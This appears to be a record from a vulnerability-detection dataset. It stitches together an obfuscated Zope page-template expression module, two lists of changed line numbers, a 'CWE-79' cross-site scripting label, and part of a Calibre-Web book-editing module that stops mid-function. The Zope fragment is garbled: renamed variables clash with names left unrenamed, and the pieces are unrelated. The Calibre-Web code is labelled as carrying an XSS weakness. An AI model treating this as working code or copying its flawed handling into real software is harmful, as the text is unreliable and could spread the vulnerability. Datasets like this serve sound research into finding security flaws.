VAR_13 = getSecurityManager().validate
VAR_4 = list(VAR_4)
path_items.reverse()
while VAR_4:
VAR_20 = VAR_4.pop()
if OFS.interfaces.ITraversable.providedBy(VAR_3):
VAR_3 = VAR_3.restrictedTraverse(VAR_20)
else:
VAR_47 = traversePathElement(VAR_3, VAR_20, VAR_4,
VAR_12=request)
if VAR_20 == '_':
warnings.warn('Traversing to the VAR_20 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
VAR_3 = VAR_47
continue
if VAR_20.startswith('_'):
raise NotFound(VAR_20)
try:
VAR_13(VAR_3, VAR_3, VAR_20, VAR_47)
VAR_3 = VAR_47
except Unauthorized:
raise NotFound(VAR_20)
return VAR_3
def FUNC_1(VAR_3, VAR_4, VAR_5):
VAR_12 = getattr(VAR_5, 'request', None)
VAR_4 = list(VAR_4)
path_items.reverse()
while VAR_4:
VAR_20 = VAR_4.pop()
if OFS.interfaces.ITraversable.providedBy(VAR_3):
VAR_3 = VAR_3.unrestrictedTraverse(VAR_20)
else:
VAR_3 = traversePathElement(VAR_3, VAR_20, VAR_4,
VAR_12=request)
return VAR_3
def FUNC_2(VAR_6, VAR_7):
if hasattr(VAR_6, '__render_with_namespace__'):
VAR_6 = ZRPythonExpr.call_with_ns(VAR_6.__render_with_namespace__, VAR_7)
else:
VAR_41 = aq_base(VAR_6)
VAR_41 = removeAllProxies(VAR_41)
if callable(VAR_41):
try:
if getattr(VAR_41, 'isDocTemp', 0):
VAR_6 = ZRPythonExpr.call_with_ns(VAR_6, VAR_7, 2)
else:
VAR_6 = ob()
except NotImplementedError:
pass
return VAR_6
class CLASS_0:
def __init__(self, *VAR_14):
self.mappings = VAR_14
def FUNC_7(self, VAR_15, VAR_16):
for m in self.mappings:
VAR_44 = m.get(VAR_15, self)
if VAR_44 is not self:
return VAR_44
return VAR_16
class CLASS_1(SubPathExpr):
VAR_17 = safe_builtins
class CLASS_2(SubPathExpr):
VAR_17 = CLASS_0(
__builtins__,
safe_builtins)
class CLASS_3(PathExpr):
VAR_18 = staticmethod(FUNC_0)
VAR_19 = CLASS_1
def __init__(self, VAR_20, VAR_21, VAR_22):
if not VAR_21.strip():
VAR_21 = 'nothing'
super().__init__(VAR_20, VAR_21, VAR_22, self._TRAVERSER)
def FUNC_8(self, VAR_5):
for VAR_21 in self._subexprs[:-1]:
try:
VAR_6 = VAR_21(VAR_5)
except VAR_2: # use Zope 2 expression types
pass
else:
break
else:
VAR_6 = self._subexprs[-1](VAR_5)
if self._hybrid:
return VAR_6
if self._name == 'nocall':
return VAR_6
return FUNC_2(VAR_6, VAR_5.vars)
def FUNC_9(self, VAR_5):
for VAR_21 in self._subexprs:
try:
VAR_21(VAR_5)
except VAR_2: # use Zope 2 expression types
pass
else:
return 1
return 0
class CLASS_4(CLASS_3):
VAR_18 = staticmethod(FUNC_1)
VAR_19 = CLASS_2
class CLASS_5(MultiMapping):
__allow_access_to_unprotected_subobjects__ = True
VAR_23 = VAR_24 = None
VAR_25 = MultiMapping.push
VAR_26 = MultiMapping.pop
class CLASS_6(Context):
def __init__(self, VAR_22, VAR_27):
super().__init__(VAR_22, VAR_27)
self.setContext('repeat', CLASS_5(self.repeat_vars))
self.vars = VAR_42 = VAR_27.copy()
self._vars_stack = [VAR_42]
def FUNC_10(self, VAR_28, VAR_29=None, VAR_30=None, VAR_16=None):
VAR_43 = self.contexts.get('request')
return FUNC_10(
VAR_28, VAR_29=domain, VAR_30=mapping,
VAR_43=context, VAR_16=default)
def FUNC_11(self, VAR_21):
VAR_44 = self.evaluate(VAR_21)
if VAR_44 is self.getDefault():
return VAR_44
return bool(VAR_44)
def FUNC_12(self, VAR_21):
VAR_31 = super().evaluateStructure(VAR_21)
return self._handleText(VAR_31, VAR_21)
def FUNC_13(self, VAR_21):
VAR_31 = self.evaluate(VAR_21)
return self._handleText(VAR_31, VAR_21)
def FUNC_14(self, VAR_31, VAR_21):
if VAR_31 is self.getDefault() or VAR_31 is None:
return VAR_31
if isinstance(VAR_31, str):
return VAR_31
elif isinstance(VAR_31, bytes):
VAR_51 = queryUtility(IUnicodeEncodingConflictResolver)
if VAR_51 is None:
return VAR_31.decode('ascii')
try:
return VAR_51.resolve(
self.contexts.get('context'), VAR_31, VAR_21)
except UnicodeDecodeError as VAR_40:
VAR_1.error("UnicodeDecodeError detected for expression \"%s\"\n"
"Resolver class: %s\n"
"Exception VAR_31: %s\n"
"Template: %s\n"
"Rendered VAR_31: %r" %
(VAR_21, VAR_51.__class__, VAR_40,
self.contexts['template'].absolute_url(1), VAR_31))
raise
else:
return str(VAR_31)
def FUNC_15(self, VAR_32, VAR_33):
return CLASS_7(VAR_32, VAR_33)
def FUNC_16(self, VAR_34, VAR_35):
raise NotImplementedError
class CLASS_7(BaseErrorInfo):
__allow_access_to_unprotected_subobjects__ = True
@implementer(IZopeAwareEngine)
class CLASS_8(Z3Engine):
VAR_36 = CLASS_6
class CLASS_9(Iterator):
__allow_access_to_unprotected_subobjects__ = True
@property
def FUNC_17(self):
return super().index()
@property
def FUNC_18(self):
return super().start()
@property
def FUNC_19(self):
return super().end()
@property
def FUNC_20(self):
return super().item()
def FUNC_21(self, VAR_20=None):
if self.start:
return True
return not self.same_part(VAR_20, self._last_item, self.item)
def FUNC_22(self, VAR_20=None):
if self.end:
return True
return not self.same_part(VAR_20, self.item, self._next)
def FUNC_23(self, VAR_20, VAR_37, VAR_38):
if VAR_20 is None:
return VAR_37 == VAR_38
VAR_45 = VAR_3()
return getattr(VAR_37, VAR_20, VAR_45) == getattr(VAR_38, VAR_20, VAR_45) is not VAR_45
def __next__(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().__next__()
def FUNC_24(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().next()
@implementer(ITraversable)
class CLASS_10(CLASS_9):
def FUNC_25(self, VAR_20, VAR_39):
if VAR_20 in ('first', 'last'):
VAR_48 = getattr(self, VAR_20)
VAR_20 = VAR_39[:]
if not VAR_20:
VAR_20 = None
VAR_39[:] = []
return VAR_48(VAR_20)
return getattr(self, VAR_20)
def FUNC_23(self, VAR_20, VAR_37, VAR_38):
if VAR_20 is None:
return VAR_37 == VAR_38
if isinstance(VAR_20, str):
VAR_20 = VAR_20.split('/')
elif isinstance(VAR_20, bytes):
VAR_20 = VAR_20.split(b'/')
try:
VAR_37 = FUNC_0(VAR_37, VAR_20, None)
VAR_38 = FUNC_0(VAR_38, VAR_20, None)
except VAR_2:
return False
return VAR_37 == VAR_38
class CLASS_11(StringExpr):
def __call__(self, VAR_5):
VAR_46 = []
if isinstance(self._expr, str):
VAR_49 = VAR_5.evaluateText
else:
VAR_49 = VAR_5.evaluate
for var in self._vars:
VAR_50 = VAR_49(var)
VAR_46.append(VAR_50)
return self._expr % tuple(VAR_46)
def FUNC_3(VAR_8=CLASS_3, VAR_9=True):
VAR_40 = CLASS_8()
VAR_40.iteratorFactory = CLASS_10
for pt in VAR_8._default_type_names:
VAR_40.registerType(pt, VAR_8)
VAR_40.registerType('string', CLASS_11)
VAR_40.registerType('python', ZRPythonExpr.PythonExpr)
VAR_40.registerType('not', NotExpr)
VAR_40.registerType('defer', DeferExpr)
VAR_40.registerType('lazy', LazyExpr)
VAR_40.registerType('provider', TALESProviderExpression)
VAR_40.registerBaseName('modules', VAR_0)
VAR_40.untrusted = VAR_9
return VAR_40
def FUNC_4():
VAR_40 = FUNC_3(CLASS_4, VAR_9=False)
VAR_40.types['python'] = PythonExpr
return VAR_40
VAR_10 = FUNC_3()
def FUNC_5():
return VAR_10
VAR_11 = FUNC_4()
def FUNC_6():
return VAR_11
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
14,
18,
21,
47,
51,
52,
54,
56,
57,
58,
59,
60,
61,
63,
64,
67,
75,
78,
85,
92,
93,
96,
104,
113,
114,
122,
124,
125,
136,
137,
140,
145,
152,
153,
156,
157,
159,
160,
161,
162,
163,
167,
168,
170,
173,
178,
179,
180,
181,
184,
192,
196,
199,
200,
202,
203,
204,
214,
215,
219,
220,
223,
231,
234,
235,
237,
240,
241,
243,
244,
247,
253,
256,
257,
258,
259,
263,
270,
277,
279,
281,
283,
285,
287,
289,
290,
291,
292,
293,
294,
298,
312,
313,
315,
317,
318,
320,
323,
328,
329,
334,
335,
336,
337,
338,
339,
340,
343,
345,
346,
348,
349,
350,
352,
353,
354,
355,
356,
357,
358,
359,
363,
367,
371,
375,
376,
377,
382,
387,
393,
394,
399,
404,
405,
410,
414,
415,
419,
423,
437,
438,
440,
444,
452,
453,
468,
469,
471,
472,
473,
477,
478,
480,
481,
484,
485,
487,
488,
491,
13,
14,
15,
16,
17,
66,
67,
68,
69,
70,
71,
95,
96,
97,
98,
99,
100,
116,
117,
118,
139,
140,
141,
142,
222,
223,
224,
225,
226,
227,
228,
331,
332,
408,
409,
265,
266,
267,
272,
273,
274,
322,
323,
324,
325,
326
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
14,
18,
21,
48,
52,
53,
55,
57,
58,
59,
60,
61,
62,
64,
65,
68,
77,
80,
86,
87,
88,
89,
96,
97,
98,
101,
102,
103,
108,
110,
112,
113,
116,
124,
133,
134,
142,
144,
145,
156,
157,
160,
165,
172,
173,
176,
177,
179,
180,
181,
182,
183,
187,
188,
190,
193,
198,
199,
200,
201,
204,
212,
216,
219,
220,
222,
223,
224,
234,
235,
239,
240,
243,
251,
254,
255,
257,
260,
261,
263,
264,
267,
273,
276,
277,
278,
279,
283,
290,
297,
299,
301,
303,
305,
307,
309,
310,
311,
312,
313,
314,
318,
332,
333,
335,
337,
338,
340,
343,
348,
349,
354,
355,
356,
357,
358,
359,
360,
363,
365,
366,
368,
369,
370,
372,
373,
374,
375,
376,
377,
378,
379,
383,
387,
391,
395,
396,
397,
402,
407,
413,
414,
419,
424,
425,
430,
434,
435,
439,
443,
457,
458,
460,
464,
472,
473,
488,
489,
491,
492,
493,
497,
498,
500,
501,
504,
505,
507,
508,
511,
13,
14,
15,
16,
17,
67,
68,
69,
70,
71,
72,
115,
116,
117,
118,
119,
120,
136,
137,
138,
159,
160,
161,
162,
242,
243,
244,
245,
246,
247,
248,
351,
352,
428,
429,
285,
286,
287,
292,
293,
294,
342,
343,
344,
345,
346
] |
1CWE-79
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
from shutil import copyfile
from uuid import uuid4
# Improve this to check if scholarly is available in a global way, like other pythonic libraries
have_scholar = True
try:
from scholarly import scholarly
except ImportError:
have_scholar = False
pass
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, request, flash, redirect, url_for, abort, Markup, Response
from flask_babel import gettext as _
from flask_login import current_user, login_required
from sqlalchemy.exc import OperationalError, IntegrityError
from sqlite3 import OperationalError as sqliteOperationalError
from . import constants, logger, isoLanguages, gdriveutils, uploader, helper
from . import config, get_locale, ub, db
from . import calibre_db
from .services.worker import WorkerThread
from .tasks.upload import TaskUpload
from .render_template import render_title_template
from .usermanagement import login_required_if_no_ano
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
editbook = Blueprint('editbook', __name__)
log = logger.create()
def upload_required(f):
    """View decorator: only users with upload or admin rights may call
    the wrapped view; everyone else gets HTTP 403."""
    @wraps(f)
    def inner(*args, **kwargs):
        allowed = current_user.role_upload() or current_user.role_admin()
        if not allowed:
            abort(403)
        return f(*args, **kwargs)
    return inner
def edit_required(f):
    """View decorator: only users with edit or admin rights may call
    the wrapped view; everyone else gets HTTP 403."""
    @wraps(f)
    def inner(*args, **kwargs):
        allowed = current_user.role_edit() or current_user.role_admin()
        if not allowed:
            abort(403)
        return f(*args, **kwargs)
    return inner
def search_objects_remove(db_book_object, db_type, input_elements):
    """Return the elements currently attached to the book that no
    longer appear in *input_elements* (case-insensitive match).

    The compared attribute depends on *db_type*: ``lang_code`` for
    'languages', ``value`` for 'custom', ``name`` otherwise.
    """
    if db_type == 'languages':
        key_of = lambda el: el.lang_code
    elif db_type == 'custom':
        key_of = lambda el: el.value
    else:
        key_of = lambda el: el.name
    wanted = {inp.lower() for inp in input_elements}
    return [el for el in db_book_object if key_of(el).lower() not in wanted]
def search_objects_add(db_book_object, db_type, input_elements):
    """Return the entries of *input_elements* not yet attached to the
    book (exact, case-sensitive comparison — unlike the remove search).

    The compared attribute depends on *db_type*: ``lang_code`` for
    'languages', ``value`` for 'custom', ``name`` otherwise.
    """
    if db_type == 'languages':
        existing = [el.lang_code for el in db_book_object]
    elif db_type == 'custom':
        existing = [el.value for el in db_book_object]
    else:
        existing = [el.name for el in db_book_object]
    return [inp for inp in input_elements if inp not in existing]
def remove_objects(db_book_object, db_session, del_elements):
    """Detach every element of *del_elements* from the book collection;
    elements left with no book references are deleted from the session.

    Returns True when at least one element was detached.
    """
    changed = False
    for element in del_elements:
        db_book_object.remove(element)
        changed = True
        # Purge orphans: an element referenced by no book anymore has
        # no reason to stay in the database.
        if len(element.books) == 0:
            db_session.delete(element)
    return changed
def add_objects(db_book_object, db_object, db_session, db_type, add_elements):
    """Attach each entry of add_elements to the book's collection.

    Looks each name up in the database first; an existing row is re-used
    (after syncing its fields via create_objects_for_addition), otherwise
    a fresh row is created and added to the session. Returns True when
    anything was appended (always True when add_elements is non-empty).
    """
    changed = False
    # pick the column to match candidates against, depending on object type
    if db_type == 'languages':
        db_filter = db_object.lang_code
    elif db_type == 'custom':
        db_filter = db_object.value
    else:
        db_filter = db_object.name
    for add_element in add_elements:
        # check if a element with that name exists
        db_element = db_session.query(db_object).filter(db_filter == add_element).first()
        # if no element is found add it
        # NOTE(review): new_element is constructed even when db_element was
        # found and new_element goes unused — harmless but wasteful
        if db_type == 'author':
            new_element = db_object(add_element, helper.get_sorted_author(add_element.replace('|', ',')), "")
        elif db_type == 'series':
            new_element = db_object(add_element, add_element)
        elif db_type == 'custom':
            new_element = db_object(value=add_element)
        elif db_type == 'publisher':
            new_element = db_object(add_element, None)
        else: # db_type should be tag or language
            new_element = db_object(add_element)
        if db_element is None:
            changed = True
            db_session.add(new_element)
            db_book_object.append(new_element)
        else:
            # re-use the existing row, syncing its value/sort fields first
            db_element = create_objects_for_addition(db_element, add_element, db_type)
            changed = True
            # add element to book
            changed = True
            db_book_object.append(db_element)
    return changed
def create_objects_for_addition(db_element, add_element, db_type):
    """Sync an existing metadata row's value/sort fields with the submitted
    string and return the (possibly modified) row."""
    if db_type == 'custom':
        if db_element.value != add_element:
            # ToDo: Before new_element, but this is not plausible
            db_element.value = add_element
        return db_element
    if db_type == 'languages':
        if db_element.lang_code != add_element:
            db_element.lang_code = add_element
        return db_element
    # all remaining types carry a 'name' attribute
    if db_element.name != add_element:
        db_element.name = add_element
        if db_type == 'series':
            db_element.sort = add_element
        elif db_type == 'author':
            # author names are stored with '|' as separator; sort uses ','
            db_element.sort = add_element.replace('|', ',')
        elif db_type == 'publisher':
            db_element.sort = None
    return db_element
# Synchronise one of a book's metadata collections (authors, tags, series,
# languages, publishers, custom columns) with the user-submitted list:
# first remove entries that disappeared, then add the new ones.
def modify_database_object(input_elements, db_book_object, db_object, db_session, db_type):
    """Return True when the book's collection was actually modified."""
    # passing input_elements not as a list may lead to undesired results
    if not isinstance(input_elements, list):
        raise TypeError(str(input_elements) + " should be passed as a list")
    # blank form fields arrive as empty strings — drop them
    input_elements = [entry for entry in input_elements if entry != '']
    # 1. elements attached to the book but missing from the input
    to_remove = search_objects_remove(db_book_object, db_type, input_elements)
    # 2. input entries not yet attached to the book
    to_add = search_objects_add(db_book_object, db_type, input_elements)
    changed = remove_objects(db_book_object, db_session, to_remove)
    if to_add:
        changed |= add_objects(db_book_object, db_object, db_session, db_type, to_add)
    return changed
def modify_identifiers(input_identifiers, db_identifiers, db_session):
    """Modify Identifiers to match input information.

    input_identifiers is a list of ready-to-persist Identifiers objects.
    db_identifiers is a list of already persisted Identifiers objects.

    Returns (changed, error): changed is True when identifiers were added,
    deleted, or updated in place; error is True when the input contained
    two identifiers with the same (case-insensitive) type.
    """
    changed = False
    # map lower-cased type -> identifier; duplicate types collapse here
    input_dict = dict([(identifier.type.lower(), identifier) for identifier in input_identifiers])
    # a collapsed duplicate means the user supplied conflicting identifiers
    error = len(input_identifiers) != len(input_dict)
    db_dict = dict([(identifier.type.lower(), identifier) for identifier in db_identifiers])
    # delete db identifiers not present in input or modify them with input val
    for identifier_type, identifier in db_dict.items():
        if identifier_type not in input_dict.keys():
            db_session.delete(identifier)
            changed = True
        else:
            input_identifier = input_dict[identifier_type]
            # bug fix: an in-place update previously did not set `changed`,
            # so callers never learned the identifier was modified
            if identifier.type != input_identifier.type or identifier.val != input_identifier.val:
                changed = True
            identifier.type = input_identifier.type
            identifier.val = input_identifier.val
    # add input identifiers not present in db
    for identifier_type, identifier in input_dict.items():
        if identifier_type not in db_dict.keys():
            db_session.add(identifier)
            changed = True
    return changed, error
@editbook.route("/ajax/delete/<int:book_id>")
@login_required
def delete_book_from_details(book_id):
    """AJAX endpoint: delete the whole book and answer with JSON status."""
    return Response(delete_book(book_id, "", True), mimetype='application/json')
@editbook.route("/delete/<int:book_id>", defaults={'book_format': ""})
@editbook.route("/delete/<int:book_id>/<string:book_format>")
@login_required
def delete_book_ajax(book_id, book_format):
    """Delete a whole book (no format given) or one format; non-JSON flow."""
    return delete_book(book_id, book_format, False)
def delete_whole_book(book_id, book):
    """Remove a book and all its app/database references.

    Clears shelf, download and read-state entries from the app database,
    detaches all calibre metadata (deleting rows that become orphaned),
    then deletes the book row itself. Does not commit the calibre session
    for the final delete — the caller is expected to commit.
    """
    # delete book from Shelfs, Downloads, Read list
    ub.session.query(ub.BookShelf).filter(ub.BookShelf.book_id == book_id).delete()
    ub.session.query(ub.ReadBook).filter(ub.ReadBook.book_id == book_id).delete()
    ub.delete_download(book_id)
    ub.session_commit()
    # check if only this book links to:
    # author, language, series, tags, custom columns
    modify_database_object([u''], book.authors, db.Authors, calibre_db.session, 'author')
    modify_database_object([u''], book.tags, db.Tags, calibre_db.session, 'tags')
    modify_database_object([u''], book.series, db.Series, calibre_db.session, 'series')
    modify_database_object([u''], book.languages, db.Languages, calibre_db.session, 'languages')
    modify_database_object([u''], book.publishers, db.Publishers, calibre_db.session, 'publishers')
    cc = calibre_db.session.query(db.Custom_Columns). \
        filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    for c in cc:
        cc_string = "custom_column_" + str(c.id)
        if not c.is_multiple:
            if len(getattr(book, cc_string)) > 0:
                if c.datatype == 'bool' or c.datatype == 'integer' or c.datatype == 'float':
                    # value rows of these types belong to this book only
                    del_cc = getattr(book, cc_string)[0]
                    getattr(book, cc_string).remove(del_cc)
                    log.debug('remove ' + str(c.id))
                    calibre_db.session.delete(del_cc)
                    calibre_db.session.commit()
                elif c.datatype == 'rating':
                    # ratings may be shared between books — delete only orphans
                    del_cc = getattr(book, cc_string)[0]
                    getattr(book, cc_string).remove(del_cc)
                    if len(del_cc.books) == 0:
                        log.debug('remove ' + str(c.id))
                        calibre_db.session.delete(del_cc)
                        calibre_db.session.commit()
                else:
                    del_cc = getattr(book, cc_string)[0]
                    getattr(book, cc_string).remove(del_cc)
                    log.debug('remove ' + str(c.id))
                    calibre_db.session.delete(del_cc)
                    calibre_db.session.commit()
        else:
            # multi-value custom column: reuse the generic sync with an empty list
            modify_database_object([u''], getattr(book, cc_string), db.cc_classes[c.id],
                                   calibre_db.session, 'custom')
    calibre_db.session.query(db.Books).filter(db.Books.id == book_id).delete()
def render_delete_book_result(book_format, jsonResponse, warning, book_id):
    """Build the success response after a deletion.

    Deleting a single format routes back to the edit page, deleting the
    whole book routes to the index; answer is JSON or a flash+redirect
    depending on jsonResponse.
    """
    if book_format:
        success_message = _('Book Format Successfully Deleted')
        if jsonResponse:
            return json.dumps([warning, {"location": url_for("editbook.edit_book", book_id=book_id),
                                         "type": "success",
                                         "format": book_format,
                                         "message": success_message}])
        flash(success_message, category="success")
        return redirect(url_for('editbook.edit_book', book_id=book_id))
    success_message = _('Book Successfully Deleted')
    if jsonResponse:
        return json.dumps([warning, {"location": url_for('web.index'),
                                     "type": "success",
                                     "format": book_format,
                                     "message": success_message}])
    flash(success_message, category="success")
    return redirect(url_for('web.index'))
def delete_book(book_id, book_format, jsonResponse):
    """Delete a book or a single book format on behalf of the current user.

    Requires the delete-books role. Removes the files via helper.delete_book
    first; on partial failure the error is surfaced as a warning, on hard
    failure the function returns early with an error response. jsonResponse
    selects JSON output (AJAX) vs. flash messages + redirects.
    """
    warning = {}
    if current_user.role_delete_books():
        book = calibre_db.get_book(book_id)
        if book:
            try:
                result, error = helper.delete_book(book, config.config_calibre_dir, book_format=book_format.upper())
                if not result:
                    # file deletion failed hard — report and bail out
                    if jsonResponse:
                        return json.dumps([{"location": url_for("editbook.edit_book", book_id=book_id),
                                            "type": "danger",
                                            "format": "",
                                            "message": error}])
                    else:
                        flash(error, category="error")
                        return redirect(url_for('editbook.edit_book', book_id=book_id))
                if error:
                    # deletion succeeded but with a non-fatal problem
                    if jsonResponse:
                        warning = {"location": url_for("editbook.edit_book", book_id=book_id),
                                   "type": "warning",
                                   "format": "",
                                   "message": error}
                    else:
                        flash(error, category="warning")
                if not book_format:
                    delete_whole_book(book_id, book)
                else:
                    # only drop the single format's data row
                    calibre_db.session.query(db.Data).filter(db.Data.book == book.id).\
                        filter(db.Data.format == book_format).delete()
                calibre_db.session.commit()
            except Exception as ex:
                log.debug_or_exception(ex)
                calibre_db.session.rollback()
                if jsonResponse:
                    return json.dumps([{"location": url_for("editbook.edit_book", book_id=book_id),
                                        "type": "danger",
                                        "format": "",
                                        "message": ex}])
                else:
                    flash(str(ex), category="error")
                    return redirect(url_for('editbook.edit_book', book_id=book_id))
        else:
            # book not found
            log.error('Book with id "%s" could not be deleted: not found', book_id)
    return render_delete_book_result(book_format, jsonResponse, warning, book_id)
def render_edit_book(book_id):
    """Render the metadata edit page for one book.

    Loads the book with custom columns, resolves language display names,
    and computes which conversion source/target formats to offer based on
    the configured converter and kepubify tools.
    """
    cc = calibre_db.session.query(db.Custom_Columns).filter(db.Custom_Columns.datatype.notin_(db.cc_exceptions)).all()
    book = calibre_db.get_filtered_book(book_id, allow_show_archived=True)
    if not book:
        flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"), category="error")
        return redirect(url_for("web.index"))
    for lang in book.languages:
        lang.language_name = isoLanguages.get_language_name(get_locale(), lang.lang_code)
    book = calibre_db.order_authors(book)
    # authors are stored with '|' separators; show them comma-separated
    author_names = []
    for authr in book.authors:
        author_names.append(authr.name.replace('|', ','))
    # Option for showing convertbook button
    valid_source_formats=list()
    allowed_conversion_formats = list()
    kepub_possible=None
    if config.config_converterpath:
        for file in book.data:
            if file.format.lower() in constants.EXTENSIONS_CONVERT_FROM:
                valid_source_formats.append(file.format.lower())
    if config.config_kepubifypath and 'epub' in [file.format.lower() for file in book.data]:
        kepub_possible = True
        if not config.config_converterpath:
            valid_source_formats.append('epub')
    # Determine what formats don't already exist
    if config.config_converterpath:
        allowed_conversion_formats = constants.EXTENSIONS_CONVERT_TO[:]
        for file in book.data:
            if file.format.lower() in allowed_conversion_formats:
                allowed_conversion_formats.remove(file.format.lower())
    if kepub_possible:
        allowed_conversion_formats.append('kepub')
    return render_title_template('book_edit.html', book=book, authors=author_names, cc=cc,
                                 title=_(u"edit metadata"), page="editbook",
                                 conversion_formats=allowed_conversion_formats,
                                 config=config,
                                 source_formats=valid_source_formats)
def edit_book_ratings(to_save, book):
    """Apply the submitted star rating to the book.

    An empty form value clears the rating. Returns True when the stored
    rating changed.
    """
    changed = False
    rating_input = to_save["rating"].strip()
    if rating_input:
        previous_rating = book.ratings[0].rating if len(book.ratings) > 0 else False
        # calibre stores ratings doubled (0-10) while the form uses 0-5 stars
        new_rating_value = int(float(to_save["rating"]) * 2)
        if new_rating_value != previous_rating:
            changed = True
            existing_rating = calibre_db.session.query(db.Ratings).filter(db.Ratings.rating == new_rating_value).first()
            if existing_rating:
                book.ratings.append(existing_rating)
            else:
                book.ratings.append(db.Ratings(rating=new_rating_value))
            if previous_rating:
                book.ratings.remove(book.ratings[0])
    elif len(book.ratings) > 0:
        book.ratings.remove(book.ratings[0])
        changed = True
    return changed
def edit_book_tags(tags, book):
    """Replace the book's tags with the comma-separated form input.

    Returns True when the tag set changed.
    """
    # split, trim, and de-duplicate while keeping the submitted order
    input_tags = helper.uniq([tag.strip() for tag in tags.split(',')])
    return modify_database_object(input_tags, book.tags, db.Tags, calibre_db.session, 'tags')
def edit_book_series(series, book):
    """Assign (or clear, on blank input) the book's series.

    Returns True when the series assignment changed.
    """
    stripped = series.strip()
    input_series = [stripped] if stripped else []
    return modify_database_object(input_series, book.series, db.Series, calibre_db.session, 'series')
def edit_book_series_index(series_index, book):
    """Store the submitted series index (defaults to '1').

    Returns True when the stored value changed; invalid numbers are
    rejected with a warning flash and leave the book untouched.
    """
    series_index = series_index or '1'
    # accept digits with at most one decimal point
    if not series_index.replace('.', '', 1).isdigit():
        flash(_("%(seriesindex)s is not a valid number, skipping", seriesindex=series_index), category="warning")
        return False
    # NOTE(review): book.series_index from the DB may be a float while the
    # form value is a string — comparison semantics kept as before
    if book.series_index == series_index:
        return False
    book.series_index = series_index
    return True
# Handle book comments/description
def edit_book_comments(comments, book):
    """Set the book's description text; returns True when it changed."""
    if len(book.comments):
        # update the existing comment row in place
        if book.comments[0].text == comments:
            return False
        book.comments[0].text = comments
        return True
    if comments:
        book.comments.append(db.Comments(text=comments, book=book.id))
        return True
    return False
def edit_book_languages(languages, book, upload=False, invalid=None):
    """Sync the book's languages with the comma-separated input.

    Language names are resolved to ISO codes; unknown entries are either
    collected into `invalid` (if a list was passed) or flashed as warnings.
    Returns True when the language set changed.
    """
    input_languages = languages.split(',')
    unknown_languages = []
    if not upload:
        # UI edit: input is localized language names
        input_l = isoLanguages.get_language_codes(get_locale(), input_languages, unknown_languages)
    else:
        # upload path: input may already contain language codes
        input_l = isoLanguages.get_valid_language_codes(get_locale(), input_languages, unknown_languages)
    for l in unknown_languages:
        log.error('%s is not a valid language', l)
        if isinstance(invalid, list):
            invalid.append(l)
        else:
            flash(_(u"%(langname)s is not a valid language", langname=l), category="warning")
    # ToDo: Not working correct
    if upload and len(input_l) == 1:
        # If the language of the file is excluded from the users view, it's not imported, to allow the user to view
        # the book it's language is set to the filter language
        if input_l[0] != current_user.filter_language() and current_user.filter_language() != "all":
            input_l[0] = calibre_db.session.query(db.Languages). \
                filter(db.Languages.lang_code == current_user.filter_language()).first().lang_code
    # Remove duplicates
    input_l = helper.uniq(input_l)
    return modify_database_object(input_l, book.languages, db.Languages, calibre_db.session, 'languages')
def edit_book_publisher(publishers, book):
    """Sync the book's (single) publisher with the submitted form value.

    Returns True when the publisher assignment changed.
    """
    if publishers:
        publisher = publishers.rstrip().strip()
        # only touch the database when the name actually differs
        if len(book.publishers) == 0 or publisher != book.publishers[0].name:
            return modify_database_object([publisher], book.publishers, db.Publishers, calibre_db.session,
                                          'publisher')
        return False
    if len(book.publishers):
        # blank input clears an existing publisher
        return modify_database_object([], book.publishers, db.Publishers, calibre_db.session, 'publisher')
    return False
def edit_cc_data_value(book_id, book, c, to_save, cc_db_value, cc_string):
    """Apply a single-value custom-column change (bool/int/float/datetime/comments).

    Normalizes the raw form string into the column's value type, then
    updates, deletes, or creates the per-book value row as needed.
    Returns (changed, to_save).
    """
    changed = False
    # normalize the raw form value into the column's storage type
    if to_save[cc_string] == 'None':
        to_save[cc_string] = None
    elif c.datatype == 'bool':
        to_save[cc_string] = 1 if to_save[cc_string] == 'True' else 0
    elif c.datatype == 'comments':
        to_save[cc_string] = Markup(to_save[cc_string]).unescape()
    elif c.datatype == 'datetime':
        try:
            to_save[cc_string] = datetime.strptime(to_save[cc_string], "%Y-%m-%d")
        except ValueError:
            # unparsable date falls back to calibre's default publication date
            to_save[cc_string] = db.Books.DEFAULT_PUBDATE
    if to_save[cc_string] != cc_db_value:
        if cc_db_value is not None:
            if to_save[cc_string] is not None:
                # update the existing value row in place
                setattr(getattr(book, cc_string)[0], 'value', to_save[cc_string])
                changed = True
            else:
                # value cleared -> remove and delete the row
                del_cc = getattr(book, cc_string)[0]
                getattr(book, cc_string).remove(del_cc)
                calibre_db.session.delete(del_cc)
                changed = True
        else:
            # no previous value -> create a fresh row for this book
            cc_class = db.cc_classes[c.id]
            new_cc = cc_class(value=to_save[cc_string], book=book_id)
            calibre_db.session.add(new_cc)
            changed = True
    return changed, to_save
def edit_cc_data_string(book, c, to_save, cc_db_value, cc_string):
    """Apply a string-like custom-column change (text/rating/enumeration).

    String values are shared rows looked up by value; the old row is
    detached (and deleted when orphaned) and the new row attached,
    creating it first if necessary. Returns (changed, to_save).
    """
    changed = False
    if c.datatype == 'rating':
        # ratings are stored doubled (0-10) relative to the 0-5 star form value
